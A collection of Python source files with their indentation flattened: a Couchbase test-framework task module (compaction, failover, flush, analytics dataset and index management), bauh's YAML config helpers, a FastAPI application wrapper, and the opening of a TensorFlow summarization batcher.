self.server = server
self.bucket = bucket
self.progress = 0
self.timeout = timeout
self.rest = RestConnection(server)
self.retries = 20
self.statuses = dict()
# get the current count of compactions
nodes = self.rest.get_nodes()
self.compaction_count = dict()
for node in nodes:
self.compaction_count[node.ip] = 0
def call(self):
self.start_task()
status = BucketHelper(self.server).compact_bucket(self.bucket.name)
if status is False:
while self.retries != 0:
sleep(60, "Wait before next compaction call", log_type="infra")
status = BucketHelper(self.server).compact_bucket(self.bucket.name)
if status is True:
self.set_result(True)
break
self.set_result(False)
self.retries -= 1
else:
self.set_result(True)
if self.result is True:
stop_time = time.time() + self.timeout
while time.time() < stop_time:
if self.timeout > 0 and time.time() > stop_time:
self.set_exception("API to check compaction status timed out in"
"%s seconds" % self.timeout)
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if self.progress > 0:
self.test_log.debug("Compaction started for %s"
% self.bucket.name)
break
sleep(2, "Wait before next check compaction call", log_type="infra")
stop_time = time.time() + self.timeout
while time.time() < stop_time:
if self.timeout > 0 and time.time() > stop_time:
self.set_exception("Compaction timed out to complete with "
"%s seconds" % self.timeout)
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is True:
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
if status is False:
self.progress = 100
self.test_log.debug("Compaction completed for %s"
% self.bucket.name)
self.test_log.info("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
break
sleep(5, "Wait before next check compaction call", log_type="infra")
else:
self.test_log.error("Compaction failed to complete within "
"%s retries" % self.retries)
self.complete_task()
class MonitorBucketCompaction(Task):
"""
Monitors bucket compaction status from start to complete
"""
def __init__(self, cluster, bucket, timeout=300):
"""
:param cluster: Couchbase cluster object
:param bucket: Bucket object
:param timeout: Timeout value in seconds
"""
super(MonitorBucketCompaction, self).__init__("CompactionTask_%s"
% bucket.name)
self.bucket = bucket
self.cluster = cluster
self.status = "NOT_STARTED"
self.progress = 0
self.timeout = timeout
self.rest = RestConnection(self.cluster.master)
def call(self):
self.start_task()
start_time = time.time()
stop_time = start_time + self.timeout
# Wait for compaction to start
while self.status != "RUNNING":
now = time.time()
if self.timeout > 0 and now > stop_time:
self.set_exception("Compaction start timed out")
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is True:
self.status = "RUNNING"
self.test_log.info("Compaction started for %s"
% self.bucket.name)
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
start_time = time.time()
stop_time = start_time + self.timeout
# Wait for compaction to complete
while self.status == "RUNNING" and self.status != "COMPLETED":
now = time.time()
if self.timeout > 0 and now > stop_time:
self.set_exception("Compaction timed out to complete with "
"%s seconds" % self.timeout)
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is False:
self.progress = 100
self.status = "COMPLETED"
self.test_log.info("Compaction completed for %s"
% self.bucket.name)
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
self.complete_task()
class CBASQueryExecuteTask(Task):
def __init__(self, cluster, cbas_util, cbas_endpoint, statement):
super(CBASQueryExecuteTask, self).__init__("Cbas_query_task: %s"
% statement)
self.cluster = cluster
self.cbas_util = cbas_util
self.cbas_endpoint = cbas_endpoint
self.statement = statement
def call(self):
self.start_task()
try:
response, metrics, errors, results, handle = \
self.cbas_util.execute_statement_on_cbas_util(
self.cluster, self.statement)
if response:
self.set_result(True)
self.actual_result = results
else:
self.test_log.error("Error during CBAS query: %s" % errors)
self.set_result(False)
except Exception as e:
self.log.error("CBASQueryExecuteTask EXCEPTION: " + e)
self.set_result(False)
self.set_exception(e)
self.complete_task()
class NodeInitializeTask(Task):
def __init__(self, server, task_manager, disabled_consistent_view=None,
rebalanceIndexWaitingDisabled=None,
rebalanceIndexPausingDisabled=None,
maxParallelIndexers=None,
maxParallelReplicaIndexers=None,
port=None, quota_percent=None,
index_quota_percent=None,
fts_quota_percent=None,
cbas_quota_percent=None,
services=None, gsi_type='forestdb'):
Task.__init__(self, "node_init_task_%s_%s" %
(server.ip, server.port))
self.server = server
self.port = port or server.port
self.index_quota_percent = index_quota_percent
self.fts_quota_percent = fts_quota_percent
self.cbas_quota_percent = cbas_quota_percent
self.quota_percent = quota_percent
self.disable_consistent_view = disabled_consistent_view
self.rebalanceIndexWaitingDisabled = rebalanceIndexWaitingDisabled
self.rebalanceIndexPausingDisabled = rebalanceIndexPausingDisabled
self.maxParallelIndexers = maxParallelIndexers
self.maxParallelReplicaIndexers = maxParallelReplicaIndexers
self.services = services
self.gsi_type = gsi_type
def call(self):
self.start_task()
rest = None
service_quota = dict()
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.set_exception(error)
# Change timeout back to 10 after https://issues.couchbase.com/browse/MB-40670 is resolved
info = Task.wait_until(lambda: rest.get_nodes_self(),
lambda x: x.memoryTotal > 0, 30)
self.test_log.debug("server: %s, nodes/self: %s", self.server,
info.__dict__)
username = self.server.rest_username
password = self.server.rest_password
if int(info.port) in range(9091, 9991):
self.set_result(True)
return
total_memory = int(info.mcdMemoryReserved - 100)
if self.quota_percent:
total_memory = int(total_memory * self.quota_percent / 100)
set_services = copy.deepcopy(self.services)
if set_services is None:
set_services = ["kv"]
if "index" in set_services:
if self.index_quota_percent:
index_memory = total_memory * self.index_quota_percent / 100
else:
index_memory = INDEX_QUOTA
self.test_log.debug("Quota for index service will be %s MB"
% index_memory)
total_memory -= index_memory
service_quota[CbServer.Settings.INDEX_MEM_QUOTA] = index_memory
if "fts" in set_services:
if self.fts_quota_percent:
fts_memory = total_memory * self.fts_quota_percent / 100
else:
fts_memory = FTS_QUOTA
self.test_log.debug("Quota for fts service will be %s MB"
% fts_memory)
total_memory -= fts_memory
service_quota[CbServer.Settings.FTS_MEM_QUOTA] = fts_memory
if "cbas" in set_services:
if self.cbas_quota_percent:
cbas_memory = total_memory * self.cbas_quota_percent / 100
else:
cbas_memory = CBAS_QUOTA
self.test_log.debug("Quota for cbas service will be %s MB"
% cbas_memory)
total_memory -= cbas_memory
service_quota[CbServer.Settings.CBAS_MEM_QUOTA] = cbas_memory
if total_memory < MIN_KV_QUOTA:
raise Exception("KV RAM needs to be more than %s MB"
" at node %s" % (MIN_KV_QUOTA, self.server.ip))
service_quota[CbServer.Settings.KV_MEM_QUOTA] = total_memory
rest.set_service_mem_quota(service_quota)
rest.set_indexer_storage_mode(username, password, self.gsi_type)
if self.services:
status = rest.init_node_services(
username=username,
password=password,
port=self.port,
hostname=self.server.ip,
services=self.services)
if not status:
self.set_exception(
Exception('unable to set services for server %s'
% self.server.ip))
if self.disable_consistent_view is not None:
rest.set_reb_cons_view(self.disable_consistent_view)
if self.rebalanceIndexWaitingDisabled is not None:
rest.set_reb_index_waiting(self.rebalanceIndexWaitingDisabled)
if self.rebalanceIndexPausingDisabled is not None:
rest.set_rebalance_index_pausing(
self.rebalanceIndexPausingDisabled)
if self.maxParallelIndexers is not None:
rest.set_max_parallel_indexers(self.maxParallelIndexers)
if self.maxParallelReplicaIndexers is not None:
rest.set_max_parallel_replica_indexers(
self.maxParallelReplicaIndexers)
rest.init_cluster(username, password, self.port)
self.server.port = self.port
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.set_exception(error)
info = rest.get_nodes_self()
if info is None:
self.set_exception(
Exception(
'unable to get information on a server %s, it is available?'
% self.server.ip))
self.set_result(total_memory)
class FailoverTask(Task):
def __init__(self, servers, to_failover=[], wait_for_pending=0,
graceful=False, use_hostnames=False, allow_unsafe=False,
all_at_once=False):
Task.__init__(self, "failover_task")
self.servers = servers
self.to_failover = to_failover
self.graceful = graceful
self.wait_for_pending = wait_for_pending
self.use_hostnames = use_hostnames
self.allow_unsafe = allow_unsafe
self.all_at_once = all_at_once
def call(self):
self.start_task()
try:
self._failover_nodes()
self.test_log.debug(
"{0} seconds sleep after failover for nodes to go pending...."
.format(self.wait_for_pending))
sleep(self.wait_for_pending)
self.set_result(True)
self.complete_task()
except (FailoverFailedException, Exception) as e:
self.set_result(False)
self.set_exception(e)
def _failover_nodes(self):
rest = RestConnection(self.servers[0])
# call REST fail_over for the nodes to be failed over all at once
if self.all_at_once:
otp_nodes = list()
for server in self.to_failover:
for node in rest.node_statuses():
if (
server.hostname if self.use_hostnames else server.ip) == node.ip and int(
server.port) == int(node.port):
otp_nodes.append(node.id)
self.test_log.debug(
"Failing over {0} with graceful={1}"
.format(otp_nodes, self.graceful))
result = rest.fail_over(otp_nodes, self.graceful,
self.allow_unsafe, self.all_at_once)
if not result:
self.set_exception("Node failover failed!!")
else:
# call REST fail_over for the nodes to be failed over one by one
for server in self.to_failover:
for node in rest.node_statuses():
if (
server.hostname if self.use_hostnames else server.ip) == node.ip and int(
server.port) == int(node.port):
self.test_log.debug(
"Failing over {0}:{1} with graceful={2}"
.format(node.ip, node.port, self.graceful))
result = rest.fail_over(node.id, self.graceful,
self.allow_unsafe)
if not result:
self.set_exception("Node failover failed!!")
rest.monitorRebalance()
class BucketFlushTask(Task):
def __init__(self, server, task_manager, bucket="default", timeout=300):
Task.__init__(self, "bucket_flush_task", task_manager)
self.server = server
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.timeout = timeout
def call(self):
self.start_task()
try:
rest = BucketHelper(self.server)
if rest.flush_bucket(self.bucket):
if MemcachedHelper.wait_for_vbuckets_ready_state(
self.server, self.bucket,
timeout_in_seconds=self.timeout):
self.set_result(True)
else:
self.test_log.error(
"Unable to reach bucket {0} on server {1} after flush"
.format(self.bucket, self.server))
self.set_result(False)
else:
self.set_result(False)
self.complete_task()
except (BucketFlushFailed, Exception) as e:
self.set_result(False)
self.set_exception(e)
class CreateDatasetsTask(Task):
def __init__(self, cluster, bucket_util, cbas_util, cbas_name_cardinality=1,
kv_name_cardinality=1, remote_datasets=False,
creation_methods=None, ds_per_collection=1,
ds_per_dv=None):
super(CreateDatasetsTask, self).__init__(
"CreateDatasetsOnAllCollectionsTask")
self.cluster = cluster
self.bucket_util = bucket_util
self.cbas_name_cardinality = cbas_name_cardinality
self.kv_name_cardinality = kv_name_cardinality
self.remote_datasets = remote_datasets
self.ds_per_collection = ds_per_collection if ds_per_collection >= 1 \
else 1
if not creation_methods:
self.creation_methods = ["cbas_collection", "cbas_dataset",
"enable_cbas_from_kv"]
else:
self.creation_methods = creation_methods
if self.ds_per_collection > 1:
self.creation_methods = list(filter(lambda method: method !=
'enable_cbas_from_kv',
self.creation_methods))
self.cbas_util = cbas_util
self.ds_per_dv = ds_per_dv
if remote_datasets:
self.remote_link_objs = self.cbas_util.list_all_link_objs(
"couchbase")
self.creation_methods.remove("enable_cbas_from_kv")
self.created_datasets = []
def call(self):
self.start_task()
try:
for bucket in self.cluster.buckets:
if self.kv_name_cardinality > 1:
for scope in self.bucket_util.get_active_scopes(bucket):
for collection in \
self.bucket_util.get_active_collections(
bucket, scope.name):
self.init_dataset_creation(
bucket, scope, collection)
else:
scope = self.bucket_util.get_scope_obj(bucket, "_default")
self.init_dataset_creation(
bucket, scope, self.bucket_util.get_collection_obj(
scope, "_default"))
self.set_result(True)
self.complete_task()
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return self.result
def dataset_present(self, dataset_name, dataverse_name):
names_present = list(filter(
lambda ds: ds.name == dataset_name and
ds.dataverse_name == dataverse_name,
self.created_datasets))
if names_present:
return True
return False
def init_dataset_creation(self, bucket, scope, collection):
for _ in range(self.ds_per_collection):
creation_method = random.choice(self.creation_methods)
dataverse = None
if self.remote_datasets:
link_name = random.choice(self.remote_link_objs).full_name
else:
link_name = None
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
if creation_method == "enable_cbas_from_kv":
enabled_from_KV = True
if bucket.name + "." + scope.name in \
self.cbas_util.dataverses.keys():
dataverse = self.cbas_util.dataverses[
bucket.name + "." + scope.name]
else:
dataverse = Dataverse(bucket.name + "." + scope.name)
name = CBASHelper.format_name(collection.name)
else:
enabled_from_KV = False
dataverses = list(
filter(lambda dv: (self.ds_per_dv is None) or (len(
dv.datasets.keys()) < self.ds_per_dv),
self.cbas_util.dataverses.values()))
if dataverses:
dataverse = random.choice(dataverses)
if self.cbas_name_cardinality > 1 and not dataverse:
dataverse = Dataverse(self.cbas_util.generate_name(
self.cbas_name_cardinality - 1, max_length=3,
fixed_length=True))
elif not dataverse:
dataverse = self.cbas_util.get_dataverse_obj("Default")
while self.dataset_present(name, dataverse.name):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
num_of_items = collection.num_items
if creation_method == "cbas_collection":
dataset_obj = CBAS_Collection(
name=name, dataverse_name=dataverse.name, link_name=link_name,
dataset_source="internal", dataset_properties={},
bucket=bucket, scope=scope, collection=collection,
enabled_from_KV=enabled_from_KV, num_of_items=num_of_items)
else:
dataset_obj = Dataset(
name=name, dataverse_name=dataverse.name,
dataset_source="internal", dataset_properties={},
bucket=bucket, scope=scope, collection=collection,
enabled_from_KV=enabled_from_KV, num_of_items=num_of_items,
link_name=link_name)
if not self.create_dataset(dataset_obj):
raise N1QLQueryException(
"Could not create dataset " + dataset_obj.name + " on " +
dataset_obj.dataverse_name)
self.created_datasets.append(dataset_obj)
if dataverse.name not in self.cbas_util.dataverses.keys():
self.cbas_util.dataverses[dataverse.name] = dataverse
self.cbas_util.dataverses[dataverse.name].datasets[
self.created_datasets[-1].full_name] = self.created_datasets[-1]
def create_dataset(self, dataset):
dataverse_name = str(dataset.dataverse_name)
if dataverse_name == "Default":
dataverse_name = None
if dataset.enabled_from_KV:
if self.kv_name_cardinality > 1:
return self.cbas_util.enable_analytics_from_KV(
self.cluster, dataset.full_kv_entity_name, False, False,
None, None, None, 120, 120)
else:
return self.cbas_util.enable_analytics_from_KV(
self.cluster, dataset.get_fully_qualified_kv_entity_name(1),
False, False, None, None, None, 120, 120)
else:
if isinstance(dataset, CBAS_Collection):
analytics_collection = True
elif isinstance(dataset, Dataset):
analytics_collection = False
if self.kv_name_cardinality > 1 and self.cbas_name_cardinality > 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name, dataset.full_kv_entity_name,
dataverse_name, False, False, None, dataset.link_name, None,
False, None, None, None, 120, 120, analytics_collection)
elif self.kv_name_cardinality > 1 and \
self.cbas_name_cardinality == 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name, dataset.full_kv_entity_name,
None, False, False, None, dataset.link_name, None, False,
None, None, None, 120, 120, analytics_collection)
elif self.kv_name_cardinality == 1 and \
self.cbas_name_cardinality > 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name,
dataset.get_fully_qualified_kv_entity_name(1),
dataverse_name, False, False, None, dataset.link_name, None,
False, None, None, None, 120, 120, analytics_collection)
else:
return self.cbas_util.create_dataset(
self.cluster, dataset.name,
dataset.get_fully_qualified_kv_entity_name(1),
None, False, False, None, dataset.link_name, None, False,
None, None, None, 120, 120, analytics_collection)
class CreateSynonymsTask(Task):
def __init__(self, cluster, cbas_util, cbas_entity, dataverse,
synonyms_per_entity=1, synonym_on_synonym=False, prefix=None):
super(CreateSynonymsTask, self).__init__("CreateSynonymsTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.cbas_entity = cbas_entity
self.dataverse = dataverse
self.synonyms_per_entity = synonyms_per_entity
self.synonym_on_synonym = synonym_on_synonym
self.prefix = prefix
def call(self):
self.start_task()
results = []
try:
for _ in range(self.synonyms_per_entity):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
while name in \
self.cbas_util.dataverses[
self.dataverse.name].synonyms.keys():
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
synonym = Synonym(
name=name, cbas_entity_name=self.cbas_entity.name,
cbas_entity_dataverse=self.cbas_entity.dataverse_name,
dataverse_name=self.dataverse.name,
synonym_on_synonym=self.synonym_on_synonym)
if not self.cbas_util.create_analytics_synonym(
self.cluster, synonym.full_name,
synonym.cbas_entity_full_name, if_not_exists=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=300, analytics_timeout=300):
results.append(False)
else:
self.cbas_util.dataverses[self.cbas_entity.dataverse_name].\
synonyms[synonym.name] = synonym
results.append(True)
if not all(results):
raise Exception(
"Failed to create all the synonyms on " + \
self.cbas_entity.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class CreateCBASIndexesTask(Task):
def __init__(self, cluster, cbas_util, dataset, indexes_per_dataset=1,
prefix=None, index_fields=[]):
super(CreateCBASIndexesTask, self).__init__(
"CreateCBASIndexesTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.indexes_per_dataset = indexes_per_dataset
self.prefix = prefix
if not index_fields:
index_fields = ["name:STRING", "age:BIGINT", "body:STRING",
"mutation_type:STRING", "mutated:BIGINT"]
self.index_fields = index_fields
self.creation_methods = ["cbas_index", "index"]
self.dataset = dataset
def call(self):
self.start_task()
try:
for i in range(self.indexes_per_dataset):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
index = CBAS_Index(
name=name, dataset_name=self.dataset.name,
dataverse_name=self.dataset.dataverse_name,
indexed_fields=random.choice(self.index_fields))
creation_method = random.choice(self.creation_methods)
if creation_method == "cbas_index":
index.analytics_index = True
else:
index.analytics_index = False
if not self.cbas_util.create_cbas_index(
self.cluster, index_name=index.name,
indexed_fields=index.indexed_fields,
dataset_name=index.full_dataset_name,
analytics_index=index.analytics_index,
validate_error_msg=False, expected_error=None,
username=None, password=None, timeout=300, analytics_timeout=300):
raise Exception(
"Failed to create index {0} on {1}({2})".format(
index.name, index.full_dataset_name,
str(index.indexed_fields)))
self.cbas_util.dataverses[
self.dataset.dataverse_name].datasets[
self.dataset.full_name].indexes[index.name] = index
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class CreateUDFTask(Task):
def __init__(self, cluster, cbas_util, udf, dataverse, body, referenced_entities=[],
parameters=[]):
super(CreateUDFTask, self).__init__("CreateUDFTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataverse = dataverse
self.body = body
self.udf = udf
self.referenced_entities = referenced_entities
self.parameters = parameters
def call(self):
self.start_task()
try:
if not self.cbas_util.create_udf(
self.cluster, name=self.udf, dataverse=self.dataverse.name,
or_replace=False, parameters=self.parameters, body=self.body,
if_not_exists=False, query_context=False, use_statement=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=120, analytics_timeout=120):
raise Exception(
"Couldn't create UDF {0} on dataverse {1}: def :{2}".format(
self.udf, self.dataverse.name, self.body))
udf_obj = CBAS_UDF(
name=self.udf, dataverse_name=self.dataverse.name, parameters=[],
body=self.body, referenced_entities=self.referenced_entities)
self.cbas_util.dataverses[
self.dataverse.name].udfs[udf_obj.full_name] = udf_obj
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropUDFTask(Task):
def __init__(self, cluster, cbas_util, dataverse):
super(DropUDFTask, self).__init__("DropUDFTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataverse = dataverse
def call(self):
self.start_task()
try:
for udf in self.dataverse.udfs.values():
if not self.cbas_util.drop_udf(
self.cluster, name=udf.name, dataverse=self.dataverse.name,
parameters=udf.parameters, if_exists=False,
use_statement=False, query_context=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=120, analytics_timeout=120):
raise Exception("Could not drop {0} on {1}: def :".format(
udf.name, self.dataverse.name, udf.body))
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropCBASIndexesTask(Task):
def __init__(self, cluster, cbas_util, dataset):
super(DropCBASIndexesTask, self).__init__("DropCBASIndexesTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataset = dataset
def call(self):
self.start_task()
try:
for index in self.dataset.indexes.values():
if not self.cbas_util.drop_cbas_index(
self.cluster, index_name=index.name,
dataset_name=index.full_dataset_name,
analytics_index=index.analytics_index,
timeout=120, analytics_timeout=120):
raise Exception("Failed to drop index {0} on {1}".format(
index.name, index.full_dataset_name))
self.cbas_util.dataverses[
self.dataset.dataverse_name].datasets[
self.dataset.full_name].indexes.pop(index.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropSynonymsTask(Task):
def __init__(self, cluster, cbas_util):
super(DropSynonymsTask, self).__init__("DropSynonymsTask")
self.cluster = cluster
self.cbas_util = cbas_util
def call(self):
self.start_task()
try:
for dv_name, dataverse in self.cbas_util.dataverses.items():
for synonym in dataverse.synonyms.values():
if not self.cbas_util.drop_analytics_synonym(
self.cluster, synonym_full_name=synonym.full_name,
if_exists=True, timeout=120, analytics_timeout=120):
raise Exception(
"Unable to drop synonym " + synonym.full_name)
self.cbas_util.dataverses[dataverse.name].synonyms.pop(
synonym.name, None)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropDatasetsTask(Task):
def __init__(self, cluster, cbas_util, kv_name_cardinality=1):
super(DropDatasetsTask, self).__init__(
"DropDatasetsTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.kv_name_cardinality = kv_name_cardinality
def call(self):
self.start_task()
try:
for dv_name, dataverse in self.cbas_util.dataverses.items():
for ds_name, dataset in dataverse.datasets.items():
if dataset.enabled_from_KV:
if self.kv_name_cardinality > 1:
if not self.cbas_util.disable_analytics_from_KV(
self.cluster, dataset.full_kv_entity_name):
raise Exception(
"Unable to disable analytics on " + \
dataset.full_kv_entity_name)
else:
if not self.cbas_util.disable_analytics_from_KV(
self.cluster,
dataset.get_fully_qualified_kv_entity_name(1)):
raise Exception(
"Unable to disable analytics on " + \
dataset.get_fully_qualified_kv_entity_name(
1))
else:
if not self.cbas_util.drop_dataset(
self.cluster, dataset.full_name):
raise Exception(
"Unable to drop dataset " + dataset.full_name)
dataverse.datasets.pop(dataset.full_name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropDataversesTask(Task):
def __init__(self, cluster, cbas_util):
super(DropDataversesTask, self).__init__(
"DropDataversesTask")
self.cbas_util = cbas_util
self.cluster = cluster
def call(self):
self.start_task()
try:
for dataverse in self.cbas_util.dataverses.values():
if dataverse.name != "Default":
if not self.cbas_util.drop_dataverse(
self.cluster, dataverse.name):
raise Exception(
"Unable to drop dataverse " + dataverse.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class ExecuteQueryTask(Task):
def __init__(self, server, query, contentType='application/x-www-form-urlencoded',
connection='keep-alive', isIndexerQuery=False, bucket=None, indexName=None, timeout=300):
super(ExecuteQueryTask, self).__init__("ExecuteQueriesTask_%sstarted%s"
% (query, time.time()))
self.server = server
self.query = query
self.timeout = timeout
self.contentType = contentType
self.connection = connection
self.isIndexerQuery = isIndexerQuery
self.rest = RestConnection(server)
self.bucket = bucket
self.index_name = indexName
self.timeout = timeout
self.isIndexerQuery = isIndexerQuery
def call(self):
self.start_task()
try:
indexer_rest = GsiHelper(self.server, self.log)
self.log.info("starting call")
status, content, header = indexer_rest.execute_query(server=self.server, query=self.query,
contentType=self.contentType,
connection=self.connection, isIndexerQuery=self.isIndexerQuery)
newContent = json.loads(content)
self.log.info("Content is:"+str(newContent))
self.set_result(status)
if self.isIndexerQuery:
result = indexer_rest.polling_create_index_status(self.bucket, index=self.index_name,
timeout=self.timeout)
self.set_result(result)
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return
self.complete_task()
|
config.py
|
import os
import traceback
from abc import abstractmethod, ABC
from pathlib import Path
from threading import Thread
from typing import Optional
import yaml
from bauh.api.constants import CONFIG_PATH
from bauh.commons import util
def read_config(file_path: str, template: dict, update_file: bool = False, update_async: bool = False) -> dict:
if not os.path.exists(file_path):
Path(CONFIG_PATH).mkdir(parents=True, exist_ok=True)
save_config(template, file_path)
else:
with open(file_path) as f:
local_config = yaml.safe_load(f.read())
if local_config:
util.deep_update(template, local_config)
if update_file:
if update_async:
Thread(target=save_config, args=(template, file_path), daemon=True).start()
else:
save_config(template, file_path)
return template
def save_config(config: dict, file_path: str):
with open(file_path, 'w+') as f:
f.write(yaml.dump(config))
class ConfigManager(ABC):
@abstractmethod
def read_config(self) -> Optional[dict]:
pass
@abstractmethod
def get_default_config(self) -> dict:
pass
@abstractmethod
def is_config_cached(self) -> bool:
pass
def get_config(self) -> dict:
default_config = self.get_default_config()
if default_config:
cached_config = self.read_config()
if cached_config:
self.merge_config(default_config, cached_config)
return default_config
@staticmethod
def merge_config(base_config: dict, current_config: dict):
util.deep_update(base_config, current_config)
@abstractmethod
def save_config(self, config_obj: dict):
pass
class YAMLConfigManager(ConfigManager, ABC):
def __init__(self, config_file_path: str):
self.file_path = config_file_path
def is_config_cached(self) -> bool:
return os.path.exists(self.file_path)
def read_config(self) -> Optional[dict]:
if self.is_config_cached():
with open(self.file_path) as f:
local_config = yaml.safe_load(f.read())
if local_config is not None:
return local_config
def save_config(self, config_obj: dict):
if config_obj:
config_dir = os.path.dirname(self.file_path)
try:
Path(config_dir).mkdir(parents=True, exist_ok=True)
except OSError:
traceback.print_exc()
return
try:
with open(self.file_path, 'w+') as f:
f.write(yaml.dump(config_obj))
except:
traceback.print_exc()
|
application.py
|
import gzip
from multiprocessing import Process
from typing import Callable
import typer
import uvicorn
from fastapi import FastAPI, Request, Response
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.routing import APIRoute
from fastapi_pagination import add_pagination
from starlette.middleware.cors import CORSMiddleware
from ._utils import singleton
from .middlewares import process_middleware
class GzipRequest(Request):
async def body(self) -> bytes:
if not hasattr(self, "_body"):
body = await super().body()
if "gzip" in self.headers.getlist("Content-Encoding"):
body = gzip.decompress(body)
self._body = body
return self._body
class GzipRoute(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
request = GzipRequest(request.scope, request.receive)
return await original_route_handler(request)
return custom_route_handler
@singleton
class Bali:
def __init__(self, base_settings=None, **kwargs):
self.base_settings = base_settings or {}
self.kwargs = kwargs
self._app = None
def __getattribute__(self, attr, *args, **kwargs):
try:
return super().__getattribute__(attr)
except AttributeError:
if not self._app:
# uvicorn entry is __call__
if attr == '__call__':
self.http()
return getattr(self._app, attr)
raise Exception('FastAPI App not initialized')
return getattr(self._app, attr)
async def __call__(self, *args, **kwargs):
self.http()
await self._app.__call__(*args, **kwargs)
def _launch_http(self):
self._app = FastAPI(**self.base_settings)
uvicorn.run("main:app", host="0.0.0.0", port=8000, reload=True, access_log=True)
def _launch_rpc(self):
service = self.kwargs.get('rpc_service')
if not service:
raise Exception('rpc_service not provided')
service.serve()
def _start_all(self):
process_http = Process(target=self._launch_http)
process_http.start()
process_rpc = Process(target=self._launch_rpc)
process_rpc.start()
process_rpc.join()
process_http.join()
def settings(self, **kwargs):
self.base_settings.update(kwargs)
def http(self):
"""load FastAPI to instance"""
self._app = FastAPI(**self.base_settings)
self._app.router.route_class = GzipRoute
# routers
for router in self.kwargs.get('routers', []):
self._app.include_router(**router)
# cors
backend_cors_origins = self.kwargs.get('backend_cors_origins')
if backend_cors_origins:
self._app.add_middleware(GZipMiddleware)
self._app.add_middleware(
CORSMiddleware,
allow_origins=[str(origin) for origin in backend_cors_origins],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
self._app.middleware('http')(process_middleware)
add_pagination(self._app)
def launch(self, http: bool = False, rpc: bool = False):
start_all = not any([http, rpc])
if start_all:
return self._start_all()
if http:
self._launch_http()
if start_all or rpc:
self._launch_rpc()
def start(self):
typer.run(self.launch)
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import queue as Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps.value:
article_words = article_words[:hps.max_enc_steps.value]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps.value, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen.value:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
# Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps.value, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
